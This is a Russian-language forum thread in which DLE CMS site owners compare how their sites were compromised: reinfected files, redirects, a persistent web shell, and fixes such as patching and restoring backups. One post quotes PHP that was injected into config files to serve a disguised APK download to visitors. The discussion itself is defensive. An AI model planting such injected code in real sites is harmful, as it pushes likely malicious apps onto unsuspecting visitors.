Вирус на сайте cms dle

В данный момент мне попадались зараженные версии 9.5 и 9.7

Редирект чаще всего стоит в dbconfig.php там сносите но латать дырки всерогно надо.

файлы

index.php

engine/engine.php

engine/init.php

engine/data/config.php

engine/data/dbconfig.php

Есть такая же беда на одном сайте :(

Пароли менял от FTP, БД и переименованной админки и в тот же день эти 5 файлов были опять изменены. Поделитесь плз секретом как извести заразу, сил уже нет... На форуме ДЛЕ советуют снять права на запись с файлов, однако шелл так и будет сидеть до поры, до времени.

Гребаный DLE, тоже ломанули, сайт андройд тематики, засунули htaccess с редиком на скачку apk файла, вероятно с sms-отправкой, только не учли, что вместо apache стоит php-fpm 😂

В следующий раз зафигачили код в конфиги

if(rand(2,4)==4&&substr($url, -9)=='.apk.html')

{

@header ("Content-Type: application/octet-stream");

@header ("Accept-Ranges: bytes");

@header ("Content-Length: ".filesize('../uploads/files/1335716503_duckhunt_1.1.apk'));

@header ("Content-Disposition: attachment; filename=".basename($url,'.apk.html').'.apk');  

@readfile('../uploads/files/1335716503_duckhunt_1.1.apk');

exit;

}

но опять обламались, на сайте даже страниц нету "..apk.html", да и apk уже был удален к этому времени 🙅

---------- Добавлено 13.01.2013 в 01:21 ----------

если дедик или впс

find путь_к_сайту -name "*.php" -ctime -30

ищет измененные php файлы за последние 30 дней, но вот толку, если в дырявый ДЛЕ можно будет снова шелл залить 😡

Поставил заплатку http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html поменял все пароли, уже пару дней нормально все...

Но проблема, видимо, в другом, раз все молчат. На оф. форуме ДЛЕ уже вроде обсуждается эта проблема, думаю целсофт что-то должны придумать в ближайшее время...

Суть проблемы как и у всех тут отписавшихся - добавили этот г-код и поставили редирект. Нашел и удалил. Все хорошо. Но на следующий день эта дрянь снова появилась.

Если есть знания, как залатать дырки - напишите в ЛС, пожалуйста, или в топике этом. Все равно ведь у всех все идентично.

На 9.3 тоже есть.

А есть такие сайты, где регистрация пользователей запрещена, но все равно сайты взломаны?

Я сам без понятия как вирус поймал этот (((

так что я думаю движок надо будет менять обидно то что на моем сайте зарегено 322 человека .

Ну да ладно буду искать другой движок так как dle доверия уже нет. Да кстате я как то пару недель назад успел полный бекап сайта сделать все файлы чистенькие. Все файлы удалил с сервака и поновой залил бекапнутые файлы и вирус ушел пусть пока сайт работает но я буду решать что бы поменять dle на что нить другое у меня был dle 9.5

Обращайтесь, попробуем выявить корни..